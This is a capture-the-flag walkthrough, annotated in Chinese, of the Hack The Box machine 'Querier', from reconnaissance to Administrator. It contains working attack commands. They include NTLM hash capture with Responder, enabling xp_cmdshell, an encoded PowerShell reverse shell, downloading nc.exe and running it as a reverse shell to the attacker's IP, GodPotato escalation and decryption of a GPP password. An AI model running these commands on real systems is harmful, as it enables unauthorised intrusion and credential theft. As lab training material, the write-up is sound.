Querier
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nmap 10.129.23.67 -p- --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-20 09:45 EST
Warning: 10.129.23.67 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.23.67
Host is up (0.15s latency).
Not shown: 65424 closed tcp ports (reset), 97 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 201.09 seconds
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nmap 10.129.23.67 -p 1433,445 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-20 09:43 EST
Nmap scan report for 10.129.23.67
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.129.23.67:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-20T14:24:00
|_Not valid after: 2055-11-20T14:24:00
| ms-sql-ntlm-info:
| 10.129.23.67:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-11-20T14:43:53+00:00; 0s from scanner time.
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-11-20T14:43:48
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.46 seconds
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nxc smb 10.129.23.67 -u '' -p '' --generate-hosts-file hosts
SMB 10.129.23.67 445 QUERIER [*] Windows 10 / Server 2019 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.67 445 QUERIER [+] HTB.LOCAL\:
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# cat hosts
10.129.23.67 QUERIER.HTB.LOCAL QUERIER
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nxc smb 10.129.23.67 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.23.67 445 QUERIER [*] Windows 10 / Server 2019 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.67 445 QUERIER [+] HTB.LOCAL\:
1.2. SMB
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nxc smb 10.129.23.67 -u '' -p '' --shares
SMB 10.129.23.67 445 QUERIER [*] Windows 10 / Server 2019 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.67 445 QUERIER [+] HTB.LOCAL\:
SMB 10.129.23.67 445 QUERIER [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# smbclient -N -L //10.129.23.67
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
>>>> Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.23.67 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# smbmap -H 10.129.23.67
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [|] Checking for open ports... [/] Checking for open ports... [-] Checking for open ports... [*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.23.67, no fun for you...
[*] Closed 1 connections
有一个 Reports 共享
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# smbclient -N //10.129.23.67/Reports
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 28 18:23:48 2019
.. D 0 Mon Jan 28 18:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 17:21:34 2019
5158399 blocks of size 4096. 849560 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (15.3 KiloBytes/sec) (average 15.3 KiloBytes/sec)
smb: \>
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# file Currency\ Volume\ Report.xlsm
Currency Volume Report.xlsm: Microsoft Excel 2007+
打开是个空的,对于这种office文件,ctf中常用的做法是可以将其解压
我解压后发现了一个二进制 .bin 文件
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# ls
_rels styles.xml theme vbaProject.bin workbook.xml worksheets
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# strings vbaProject.bin
macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
>>>> Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
further testing required
Attribut
e VB_Nam
e = "Thi
sWorkboo
0{00020P819-
$0046}
|Global
Spac
dCreat
Pred
ecla
BExpo
Templ
ateDeriv
Bustomi
acro to @pull d
for clie
nt volu
reports
further
testing@ requi
ub Conne
ct()
As A DODB.
iohn
ecordset
Dr={SQ
L Server
=QUER
IER;@Bste
d_G#=no;D
@;Uid
<;Pwd=
PcwTWTHR
wryjc$c6
!TimeouBt
J= ad#B
' MsgBox
J su
ccessfulq@
Exec
SELECT *( @@
b @Bt
OMD~E
heet
s(1).Ran
ge("A1")
@\pyFrom
$rs.Cl
nEnd IfE
Attribut
e VB_Nam
e = "She@et1"
t0{000
20820-
$0046
|Global!
Spac
dCrea
tabl
Pre decla
BExp
Temp
lateDeri
Bustom
Excel
Win16
Win32
Win64x
VBA6
VBA7
Project1
stdole
VBAProject
Office
ThisWorkbook|
_Evaluate
Sheet1
Connect\
Workbookk
connu
ADODBs
Connection
Recordset
ConnectionString
ConnectionTimeout
State
adStateOpen
ExecuteY
Sheets
Range
CopyFromRecordsetV
Worksheet
VBAProje
stdole>
*\G{00
020430-
6}#2.0#0
#C:\Wind
ows\Syst em32\
tlb#OLE
Automati
EOffDic
2DF8D04C
-5BFA-10
1B-BDE5
gram Fil
es\Commo
Micros
oft Shar
ed\OFFIC
E16\MSO.0DLL#
M 1@6.0 Ob
Library
ThisW
orkbookG
1Bxq
Sheet1G
S@#e@Xt
ThisWorkbook
Sheet1
ID="{7819C482-CC73-4FB3-8245-31BB2E19C38A}"
Document=ThisWorkbook/&H00000000
Document=Sheet1/&H00000000
HelpFile=""
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="191BC9EFCDEFCDEFCDEFCD"
DPB="8D8F5D2BA59EA69EA69E"
GC="0103D1D2D2D2D22D"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisWorkbook=26, 26, 1062, 609, C
Sheet1=52, 52, 1088, 635, C
1.3. mssql
获取到了mssql凭据 -u reporting -p 'PcwTWTHRwryjc$c6'
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# nxc mssql 10.129.23.67 -u reporting -p 'PcwTWTHRwryjc$c6' --local-auth
MSSQL 10.129.23.67 1433 QUERIER [*] Windows 10 / Server 2019 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
MSSQL 10.129.23.67 1433 QUERIER [-] QUERIER\reporting:PcwTWTHRwryjc$c6 (Login failed for user 'reporting'. Please try again with or without '--local-auth')
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# nxc mssql 10.129.23.67 -u reporting -p 'PcwTWTHRwryjc$c6'
MSSQL 10.129.23.67 1433 QUERIER [*] Windows 10 / Server 2019 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
MSSQL 10.129.23.67 1433 QUERIER [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6
nxc验证失败,
使用 impacket-mssqlclient 成功连接上来
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# impacket-mssqlclient 'reporting:PcwTWTHRwryjc$c6@10.129.23.67' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\reporting reporting@volume)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- ----------------- --------- ------------- ---------- -----------------------------------------------------------
dbo db_owner NULL NULL dbo b'1 ' b'010500000000000515000000e5cfd9d970fd97dacb23a5d1f4010000'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
reporting db_owner QUERIER\reporting volume dbo b'5 ' b'010500000000000515000000e5cfd9d970fd97dacb23a5d1ea030000'
sys public NULL NULL NULL b'4 ' NULL
SQL (QUERIER\reporting reporting@volume)> enable_xp_cmdshell
ERROR(QUERIER): Line 105: User does not have permission to perform this action.
ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (QUERIER\reporting reporting@volume)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
正常权限,不是dba,没有可模拟的身份
1.4. NTLMv2-SSP
先拿一下服务账号的NTLMv2-SSP hash
Responder 开监听,然后使用 xp_dirtree 触发
SQL (QUERIER\reporting reporting@volume)> xp_dirtree //10.10.14.86/share
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.23.67
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:1122334455667788:0384CD21B8D8CB6F1AD9796A876934C3:0101000000000000807EA5400B5ADC0199CA65D5ABCBA0F70000000002000800460052003800440001001E00570049004E002D005000360050005500300056005800530032003000490004003400570049004E002D00500036005000550030005600580053003200300049002E0046005200380044002E004C004F00430041004C000300140046005200380044002E004C004F00430041004C000500140046005200380044002E004C004F00430041004C0007000800807EA5400B5ADC01060004000200000008003000300000000000000000000000003000009C9ADA8F65171E78ACFEFD0AC2C7E1285F7A6A747629AF3818640D09EFBBB9BC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0038003600000000000000000000000000
[+] Exiting...
MSSQL-SVC::QUERIER:1122334455667788:0384cd21b8d8cb6f1ad9796a876934c3:0101000000000000807ea5400b5adc0199ca65d5abcba0f70000000002000800460052003800440001001e00570049004e002d005000360050005500300056005800530032003000490004003400570049004e002d00500036005000550030005600580053003200300049002e0046005200380044002e004c004f00430041004c000300140046005200380044002e004c004f00430041004c000500140046005200380044002e004c004f00430041004c0007000800807ea5400b5adc01060004000200000008003000300000000000000000000000003000009c9ada8f65171e78acfefd0ac2c7e1285f7a6a747629af3818640d09efbbb9bc0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0038003600000000000000000000000000:corporate568
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
MSSQL-SVC corporate568
登录上去
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# impacket-mssqlclient 'MSSQL-SVC:corporate568@10.129.23.67' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc dbo@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
volume 0
SQL (QUERIER\mssql-svc dbo@master)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
--------------------------------- -------- --------------------------------- --------- ------------- ---------- -------------------------------------------------------------------
##MS_AgentSigningCertificate## public ##MS_AgentSigningCertificate## master NULL b'6 ' b'01060000000000090100000014996a2fb6d6ef7960d6ad52ac60318368179ae7'
##MS_PolicyEventProcessingLogin## public ##MS_PolicyEventProcessingLogin## master dbo b'5 ' b'b358f79fa0d32a4e9087d7897f494f6a'
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
mssql-svc public QUERIER\mssql-svc master dbo b'7 ' b'010500000000000515000000e5cfd9d970fd97dacb23a5d1e9030000'
sys public NULL NULL NULL b'4 ' NULL
SQL (QUERIER\mssql-svc dbo@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------- ----------------------------
>>>> b'USER' msdb IMPERSONATE GRANT dc_admin MS_DataCollectorInternalUser
可以模拟 dc_admin 用户,但这里无法模拟成功,
SQL (QUERIER\mssql-svc dbo@msdb)> exec_as_user dc_admin
ERROR(QUERIER): Line 1: Cannot execute as the database principal because the principal "dc_admin" does not exist, this type of principal cannot be impersonated, or you do not have permission.
SQL (QUERIER\mssql-svc dbo@msdb)> SELECT name, type_desc FROM msdb.sys.database_principals WHERE name = 'dc_admin';
name type_desc
-------- -------------
>>>> dc_admin DATABASE_ROLE
这里的
dc_admin在 msdb 里是一个数据库角色 ,而非可被模拟的用户
- 使用
exec_as_user只能针对用户、证书、对称密钥等“安全主体”,不能直接 impersonate 角色
1.5. xp_cmdshell
但很幸运,我们当前用户可以执行命令
SQL (QUERIER\mssql-svc dbo@msdb)> enable_xp_cmdshell
INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc dbo@msdb)> xp_cmdshell whoami
output
-----------------
querier\mssql-svc
NULL
这里弹shell被杀软拦截了
SQL (QUERIER\mssql-svc dbo@msdb)> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA2ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
output
--------------------------------------------------------------------------------
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">At line:1 char:1_x000D__x000A_</S><S S="Error">+ $client = New-Object System.Net.Sockets.TCPClient("10.10.14.86",4444) ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~
>>>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error">This script contains malicious content and has been blocked by your antivirus software._x000D__x000A_</S><S S="Error"> + CategoryInfo : ParserError: (
:) [], ParentContainsErrorRecordException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : ScriptContainedMaliciousContent_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
提示 “This script contains malicious content and has been blocked by your antivirus software”
直接传文件,用nc弹
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.86/nc.exe -Outfile c:\users\mssqlsvc\nc.exe"'
这也下不了,换SMB下载
(kali)
impacket-smbserver share ./ -smb2support
(victim)
SQL (QUERIER\mssql-svc dbo@msdb)> xp_cmdshell \\10.10.14.86\share\nc.exe -e cmd.exe 10.10.14.86 4444
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.86] from (UNKNOWN) [10.129.23.67] 49679
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svc
C:\Windows\system32>
2. system
2.1. (非预期)土豆提权
老机器通杀了 毕竟这台机器是19年出的,
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
>>>> SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\Users\mssql-svc\Desktop>copy \\10.10.14.86\share\GodPotato.exe .\GodPotato.exe
copy \\10.10.14.86\share\GodPotato.exe .\GodPotato.exe
c:\Users\mssql-svc\Desktop>.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140721998462976
[*] DispatchTable: 0x140722000776400
[*] UseProtseqFunction: 0x140722000154720
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\35f4f931-dd83-458b-8848-34b35d4d7f79\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000bc02-0584-ffff-ca92-217fd53f55f0
[*] DCOM obj OXID: 0xc5fe61b71d4546b
[*] DCOM obj OID: 0x5b4ab1aec979c051
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x812 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3748
nt authority\system
2.2. GPP Password
上传 winPEAS 检测一下
发现有 GPP Password
[+] GPP Password
C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
c:\Users\Public>type "C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
type "C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
MyUnclesAreMarioAndLuigi!!1!
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# evil-winrm -i 10.129.23.67 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
4d26b9c03eb730524ba71d6994e16573